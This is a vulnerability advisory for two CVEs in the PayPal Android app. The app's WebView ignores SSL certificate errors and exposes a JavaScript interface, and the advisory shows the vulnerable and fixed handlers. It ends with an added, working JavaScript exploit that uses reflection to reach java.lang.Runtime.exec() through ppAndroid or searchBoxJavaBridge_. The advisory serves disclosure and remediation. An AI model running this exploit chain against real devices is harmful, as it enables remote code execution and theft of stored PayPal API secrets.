Paypal Remote Code Execution

CVE-2013-7201, CVE-2013-7202

Type: Paypal Remote Code Execution
Severity: High
Affected products: Paypal Android Application
Affected Versions: Paypal <= 5.3 on Android < 4.2
Vendor: Paypal
Vendor Response: see Timeline below
Authors: Henry Hoggard, MWR Labs
CVE Reference: SSL Bypass: CVE-2013-7201; Remote Code Execution: CVE-2013-7202
Timeline

2013-12-23  Sent initial details of the bugs
2013-12-23  Paypal acknowledges the bugs, pointing out that SSL issues are out of scope in their bug bounty
2013-12-29  Paypal requests a video PoC
2013-12-29  PoC video provided
2014-02-25  Paypal claims no risk to the Paypal brand

A vulnerability was discovered in the PayPal application for Android that allows a network attacker to gain code execution on the device via a man-in-the-middle attack.

Description

PayPal for Android allows users to send and receive money from their device and offers features similar to the web-based PayPal application. The PayPal Android app is vulnerable to remote code execution via a man-in-the-middle attack.

Impact

Remote code and command execution in the context of the application, i.e. with the PayPal app's UID and permissions. The API secrets needed to interact with PayPal's API are stored in cleartext in the app's shared preferences file; they could be stolen using this exploit and then used to call methods of the PayPal API as the victim.

Cause

PayPal uses a WebView whose client ignores SSL certificate errors, and the same WebView exposes a Java object to JavaScript through a JavaScript interface. The combination of the two bugs allows an attacker who can man-in-the-middle the WebView's HTTPS connections to inject JavaScript and execute code on the device.

Interim Workaround

Do not use the PayPal Android app on untrusted networks such as public Wi-Fi. Update your device to Android 4.2 or later if possible.

Solution

Changing proceed() to cancel() in onReceivedSslError() stops the WebView from accepting invalid SSL certificates. This prevents an attacker from man-in-the-middling the WebView's traffic and injecting malicious JavaScript, and so closes the path to the JavaScript interface.

// Fixed handler: abort the load on any certificate error instead of proceeding
@Override
public void onReceivedSslError(WebView paramWebView, SslErrorHandler paramSslErrorHandler,
        SslError paramSslError)
{
    paramSslErrorHandler.cancel();
}

Technical Details

SSL Bypass

The class WebHybridClient.java implements the WebViewClient for a WebView. When it receives an SSL error it proceeds with the request rather than displaying an error or killing the connection, so an attacker can MITM any HTTPS request made through this WebView.

// Vulnerable handler: proceed() accepts any certificate, including an attacker's
public void onReceivedSslError(WebView paramWebView, SslErrorHandler paramSslErrorHandler,
        SslError paramSslError)
{
    paramSslErrorHandler.proceed();
}

Vulnerable Classes

  • com/paypal/android/choreographer/flows/help/WebHybridClient.java
  • com/paypal/android/choreographer/flows/shop/fragments/EnhancedCheckinHybridFragment.java
  • com/paypal/android/choreographer/web/WebHybridClient.java

Javascript Code Execution

The WebHybridClient class contains a method that registers a Java object as a JavaScript interface on the WebView (addJavascriptInterface). On Android 4.1 and below, JavaScript that can reach such an interface can call any public method of the exposed object, including getClass(), and from there use Java reflection to execute arbitrary code in the context of the PayPal application.

public View onCreateView(LayoutInflater paramLayoutInflater, ViewGroup paramViewGroup,
        Bundle paramBundle)
{
    ...
    // JavaScript is enabled for the WebView whose SSL errors are ignored above
    this.web.getSettings().setJavaScriptEnabled(true);
    ...
    // mListener becomes reachable from page JavaScript as window.ppAndroid
    this.web.addJavascriptInterface(this.mListener, "ppAndroid");
    ...
    return localView;
}

It has since been discovered that an application does not even need to register its own JavaScript interface to be vulnerable to this attack: before Android 4.2 the WebView framework itself added a JavaScript interface (searchBoxJavaBridge_) to every WebView. This means every application that loads attacker-controllable content into a WebView, whether over cleartext HTTP or, as here, over HTTPS with certificate errors ignored, is exposed. Note that Android 4.2 restricts the reachable methods to those annotated with @JavascriptInterface only for apps that target API level 17 or higher, so updating the OS alone does not protect an app built against an older target.
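To make concrete what "execute code via the JavaScript interface" means, the following is an added example (not code from the MWR advisory or from PayPal) of the generic reflection chain that a page injected by the MITM attacker would run inside a pre-4.2 WebView. It tries the app's own bridge name from the advisory, ppAndroid, and the framework bridge searchBoxJavaBridge_; the command `id` and the `findBridges`/`reflectiveExec`/`exploit` helper names are illustrative assumptions.

```javascript
// Added example, not from the advisory: reflection-based command execution
// through an exposed JavaScript interface in a pre-4.2 Android WebView.
// Every Java object registered with addJavascriptInterface() inherits
// getClass(), and before Android 4.2 (or for apps targeting API < 17) all of
// its public methods are callable from JavaScript, so java.lang.Runtime is
// reachable through reflection.

// Candidate bridge names: "ppAndroid" is the interface registered by the app
// (see onCreateView above); "searchBoxJavaBridge_" is the one the WebView
// framework itself registered before Android 4.2.
var BRIDGE_NAMES = ['ppAndroid', 'searchBoxJavaBridge_'];

// Return the candidate names that exist on `scope` (window inside the WebView;
// a constructed mock when run outside a device) and expose getClass().
function findBridges(scope, names) {
  var found = [];
  for (var i = 0; i < names.length; i++) {
    var b = scope ? scope[names[i]] : undefined;
    if (b !== null && typeof b === 'object' && typeof b.getClass === 'function') {
      found.push(names[i]);
    }
  }
  return found;
}

// Walk from any bridge object to java.lang.Runtime.exec():
//   bridge.getClass()                      -> java.lang.Class of the bridge
//         .forName("java.lang.Runtime")    -> Class object for Runtime
//         .getMethod("getRuntime", null)   -> static Method getRuntime()
//         .invoke(null, null)              -> the Runtime singleton
//         .exec(cmd)                       -> java.lang.Process
// The command runs with the app's UID and permissions; the caller can read
// its output through the returned Process's InputStream.
function reflectiveExec(bridge, cmd) {
  var runtimeClass = bridge.getClass().forName('java.lang.Runtime');
  var getRuntime = runtimeClass.getMethod('getRuntime', null);
  var runtime = getRuntime.invoke(null, null);
  return runtime.exec(cmd);
}

// Entry point for the injected page: run `cmd` through the first usable bridge.
// Returns null when no bridge is exploitable, e.g. on Android 4.2+ with
// targetSdkVersion >= 17, where only @JavascriptInterface methods are exposed
// and getClass() is not reachable.
function exploit(scope, cmd) {
  var bridges = findBridges(scope, BRIDGE_NAMES);
  for (var i = 0; i < bridges.length; i++) {
    try {
      return { bridge: bridges[i], process: reflectiveExec(scope[bridges[i]], cmd) };
    } catch (e) {
      // getClass()/forName() not exposed on this bridge: try the next one.
    }
  }
  return null;
}

// Inside a real WebView `window` holds the bridges; elsewhere this is a no-op.
if (typeof window !== 'undefined') {
  var result = exploit(window, 'id'); // illustrative command only
}
```

The `exploit()` return value doubles as a check for the fix: once the app ships with the annotation-only interface (API 17+ target) or with the certificate error handling corrected so the page is never injected, the chain fails at `getClass()` and `exploit()` returns null.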